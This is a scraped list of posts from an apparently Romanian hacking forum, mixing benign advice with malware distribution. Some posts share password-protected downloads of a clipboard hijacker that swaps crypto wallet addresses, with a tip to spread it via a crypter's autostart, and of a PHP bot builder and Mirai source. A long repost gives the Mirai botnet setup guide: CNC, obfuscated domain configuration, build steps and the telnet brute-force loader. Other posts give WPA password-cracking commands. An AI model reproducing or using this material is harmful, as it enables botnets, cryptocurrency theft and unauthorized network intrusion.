-
Posts
507 -
Joined
-
Last visited
-
Days Won
10
Posts posted by Technetium
-
-
Security - encryption, data integrity (data can’t be corrupted), authentication (prevents MiTM)
Performance - HTTP/2; reduced load time
HTTPS is a ranking factor.
Referral data - daca tu-ti faci reclama pe Reddit care are HTTPS si traficul vine de acolo si tu ai HTTP, referral data va fi blocat in Google Analytics. Pot dezvolta aici da' n-am chef
Daca ai un simplu blog, fara payment system si nu sunt introduse date sensibile de catre utilizatori, atunci n-ai nevoie de HTTPS.
Pentru HTTPS iti trebuie un certificat SSL, cum ti-a scris @curiosul, pe care-l instalezi la tine pe sait - gasesti informatii cu sutele cum sa procedezi, n-ai cum sa dai gres.
- 1
-
Foloseste php decode.
@van3 pm cu scriptul. Nu-mi trebuie bani.
-
Before you start, you need to edit the SecretKey and UserAgent in the php - script, replace "CodedByBecks" and "AgentBondJamesBond" with anything you want. You need to type in the same keys in the builder!
https://www.sendspace.com/file/fegf4a
Pass: siggy+Basescu: cnN0Zm9ydW1z
- 1
-
-
3 hours ago, BidiCooL said:
Salut si bine v-am regasit .
Imi cer scuze daca nu postez unde trebuie.
M-ar interesa si pe mine niste informatii cu privire la site-urile "nu prea legale" ca cele de filme online, porno si asa mai departe.
Am observat ca din ce in ce sunt mai pusi pe inchis site-urile de genul... cum ai putea evita sa nu te gaseasca?
Ok cumperi un domeniu, il gazduiesti, asta fara sa iti dai datele personale, dar trebuie monetizat. Ma gandesc ca aici trebuie sa iti dai datele personale altfel nu vad cum ai putea sa iti retragi banii decat prin bitcoins, ceea ce as vrea sa evit.
Stiti cumva cum sau unde pot face treaba asta? sau cum sta exact problema?
@DuTy^ Omul da in cap, ce face? A pus o intrebare pertinenta. Daca stii si vrei sa-l ajuti, il ajuti. Daca nu, te abtii. Democratia asta! Numai lupi moralisti pe aici!
Tu declari tot ce castigi din freelancing?
Ajutor, Ajutor, Ajutor, Market, Cereri, Stiri, Stiri, Ajutor, Off-topic. Cam asa stau lucrurile vad. Adica un leecher la puterea a treia.
Il gasesti aici pe baiat.
- 1
-
Datele de trafic ale abonatilor, pe care le pastreaza in prezent operatorii de telefonie si internet, vor fi stocate timp de maximum trei ani, potrivit unui act normativ publicat miercuri in Monitorul Oficial. In acelasi timp, regulile noi prevad ca aceste date vor fi accesate doar in baza unei autorizari judecatoresti.
Furnizorii de servicii de comunicatii electronice destinate publicului si furnizorii de retele publice de comunicatii electronice au obligaţia sa puna la dispozitia acestora, de indata, dar nu mai tarziu de 48 de ore, datele de trafic, datele de identificare a echipamentului si datele de localizare, in conformitate cu prevederile referitoare la protectia datelor cu caracter personal.
In plus, o noua prevedere stabileste ca datele de trafic, datele de identificare a echipamentului si datele de localizare solicitate nu vor putea fi sterse sau anonimizate de catre furnizori, atunci cand solicitarea este insotita de o notificare cu privire la necesitatea mentinerii lor. Cu toate acestea, ele nu vor putea fi pastrate mai mult de cinci ani de la data solicitarii sau, după caz, pana la pronuntarea unei hotarari definitive a instantei de judecata.
Legea nr. 235/2015 pentru modificarea si completarea Legii nr. 506/2004 privind prelucrarea datelor cu caracter personal si protectia vietii private in sectorul comunicatiilor electronice a fost publicata in Monitorul Oficial, Partea I, nr. 767 din 14 octombrie si va intra in vigoare sambata.
Mai multe informatii, aici.
Documentul oficial in format .pdf aici. - poate il are cineva si binevoieste sa-l "share-uiasca" cu noi.
- 1
-
-
The tool, after you built it, scans the clipboard for a wallet, where most of them are stored before sending coins from A to B. If a wallet is found, it replaces it with the one from the tool. You can enter your wallet in the builder.
Both, builder and stub, are coded in pure C++ and they only use the winapi. When you want to spread it use the autostart of your crypter.demo:
https://www.sendspace.com/file/y610su
pass Basescu: cnN0Zm9ydW1z
-
https://www.sendspace.com/file/hzulk5
sau
https://www.wilderssecurity.com/attachments/pegrs-guide-to-appguard-4-x-pdf.240221/ - trebuie sa aveti cont si sa va log-ati.
sait oficial AppGuard: http://www.appguardus.com/
Appguard v4.3.14.5: https://blueridgenetworks.s3.amazonaws.com/UpdateFolder/AppGuardSetup_4_3_14_5.exe
full: http://www.solidfiles.com/v/MrGR2meZLyxMp
howto: "copy files in Safe Mode"
-
- 1
-
13 minutes ago, CD-RAY said:
,,,trebuie sa recunosc ,mai trebuie cizelat,lucrat,etc...!!!....http://fiwi-antennas.tk/
Nu conteaza asta! Iti multumesc pentru contributiile aduse si mult succes cu sait-ul!
Ai si shop? Sau o lista cu produse, preturi si o scurta descriere?
- 1
-
12 minutes ago, blaksatyn said:
Am un gtx titan de 6gb ddr5 si imi face probleme mereu ...ba merge ba nu merge ... poate sa ma ajute cineva sa imi spuna daca stie un electronist care se ocupa cu asa ceva sau un atelier care repara placi video ?
Multumesc
ai pm.
- 1
-
On 10/7/2016 at 4:33 PM, quantum said:
Ti-am dat pm.
Salut! Sunt si eu interesat. Multumesc!
-
Bun venit, spor la invatat si sedere placuta!
-
On 10/5/2016 at 0:45 PM, Taaz said:
folositi webarchive daca vreti fisierele originale, deoarece site-ul nu mai merge
1) http://santasbigcandycane.cx/mirai.src.zip
2) http://santasbigcandycane.cx/loader.src.zipCine le vrea, pm.
@abraxyss si alti doritori:
https://www.sendspace.com/file/arxwm2
RAR5, pass - Basescu: cnN0Zm9ydW1z
-
Requirements
QuoteBare Minimum
2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loadingPro Setup
2 VPS and 4 servers
- 1 VPS with extremely bulletproof host for database server
- 1 VPS, rootkitted, for scanReceiver and distributor
- 1 server for CNC (used like 2% CPU with 400k bots)
- 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)
Infrastructure OverviewQuote- To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address
- Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding bruted result, bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.
- Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utitlity scanListen binary appear in debug folder.Mirai uses a spreading mechanism similar to self-rep, but what I call "real-time-load". Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.
The loader can be configured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections - in theory, this value lot less). I would have maybe 60k - 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.
Configuring Bot
Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.- TABLE_CNC_DOMAIN - Domain name of CNC to connect to - DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards
- TABLE_CNC_PORT - Port to connect to, its set to 23 already
- TABLE_SCAN_CB_DOMAIN - When finding bruted results, this domain it is reported to
- TABLE_SCAN_CB_PORT - Port to connect to for bruted results, it is set to 48101 already.In ./mirai/tools you will find something called enc.c - You must compile this to output things to put in the table.c file
Run this inside mirai directory:
./build.sh debug telnet
You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won't affect compiling the enc tool
Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:
./debug/enc string fuck.the.police.com
The output should look like this:
XOR'ing 20 bytes of data...
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see "XOR'ing 20 bytes of data". This value must replace the last argument as well. So for example, the table.c line originally looks like this:
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
Now that we know value from enc tool, we update it like this:
add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22", 20); // fuck.the.police.com
Some values are strings, some are port (uint16 in network order / big endian).
Configuring CNCapt-get install mysql-server mysql-client
CNC requires database to work. When you install database, go into it and run following commands:
http://pastebin.com/86d0iL9gThis will create database for you. To add your user:
INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, '');
Now, go into file ./mirai/cnc/main.go
Edit these values:const DatabaseAddr string = "127.0.0.1" const DatabaseUser string = "root" const DatabasePass string = "password" const DatabaseTable string = "mirai"
To the information for the mysql server you just installed.
Setting Up Cross Compilers
Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.
Building CNC+Bot
The CNC, bot, and related tools:
1) http://santasbigcandycane.cx/mirai.src.zip
2) http://santasbigcandycane.cx/loader.src.zipHow to build bot + CNC
In mirai folder, there is build.sh script../build.sh debug telnet
Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder
./build.sh release telnet
Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: "mirai.$ARCH" to ./mirai/release folder
Building Echo Loader
Loader reads telnet entries from STDIN in following format:
ip:port user:passIt detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget. You can find code to compile the tiny downloader stub here:
http://santasbigcandycane.cx/dlr.src.zipYou need to edit your main.c for the dlr to include the HTTP server IP. The idea is, if the iot device doesn have tftp or wget, then it will echo load this 2kb binary, which download the real binary, since echo loading really slow.
When you compile, place your dlr.* files into the folder ./bins for the loader./build.sh
Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this:
cat file.txt | ./loader
E mai usor asa pentru cei ce nu au cont pe hackforums, nu vor sau nu pot sa intre.
- 1
-
-
Programming e-books:
https://github.com/andrewpage/programming-ebooks
https://github.com/HackathonHackers/programming-ebooks
Information Security related Mind Maps:
http://www.amanhardikar.com/mindmaps.html
OSINT related links:
-
1 minute ago, danyweb09 said:
Folositi hashcat in loc de aircrack-ng pentru dictionary atack e mult mai puternic. Trebuie doar convertita captura din cap in hccap.
Asa este, are dreptate dany. Am gasit site-ul acesta https://hashcat.net/cap2hccap/, dar nu l-am folosit niciodata; foloseste https://sourceforge.net/projects/cap2hccap/.Eu am mers batraneste folosindu-ma de aircrack-ng.
-
Atacul atat de mult dezbatut ce numeste "Evil Twin", si nu este ceva foarte complicat cum descriu toti "profesorii" de pe aici. Trebuie doar sa te documentezi si sa pui in practica ceea ce ai citit. Sunt o gramada de forumuri, bloguri, etc cu tutoriale care explica in detaliu ceea ce trebuie sa faci. Iti las cateva resurse: de pe null-byte aici si aici, altele aici si aici.
Prea multe informatii nu ne-ai dat...Are WPS enabled? In ce tara esti? Modelul router-ului?
Tara in care esti conteaza atunci cand crack-uiesti handshake-ul, dictionary attack (brute force).
Foarte multi, in tarile straine, isi folosesc ca parola (8 digits):
1. Numerele de telefon
Pentru asta ai Crunch (mai jos un exemplu pentru numere de telefon care incep cu 22)
crunch 8 8 -t 22%%%%%% -u|aircrack-ng -b aa:bb:cc:dd:ee:ff -w - /root/handshake.cap
Informatii despre Crunch gasesti pe forumul de la Kali Linux, citeste si aici
2. Data nasterii, iti las un script, wordlist manipulator aici
Apoi creezi o lista cu date de nastere:
aircrack-ng -w /root/birthdates.txt handshake.cap
-
-
4 hours ago, jan100 said:
La modelul asta nu da nimic la firmware
Care este modelul exact? GT-S5350 si mai cum? E luat de la Orange sau Vodafone? E root-at?
-
1 hour ago, jan100 said:
Scuze am gresit modelul este s-5350.Nu este de afara
Gasesti pe sammobile.com ce te intereseaza. Daca nu te descurci, imi spui si te ajut eu.
-
Multumesc tuturor!
Decodare fisier
in Programare
Posted · Edited by Technetium
Cand faci o afirmatie, argumenteaza.
Tu declari tot ce castigi pe net? Asta e problema noastra, stim doar sa bem bere, sa spargem seminte, sa stam la colt de scara, sa barfim si sa-i judecam pe altii.
kingwz site:extreamcs.com - vad ca ai mai vandut chestii, te dau la Fisc, ce zici?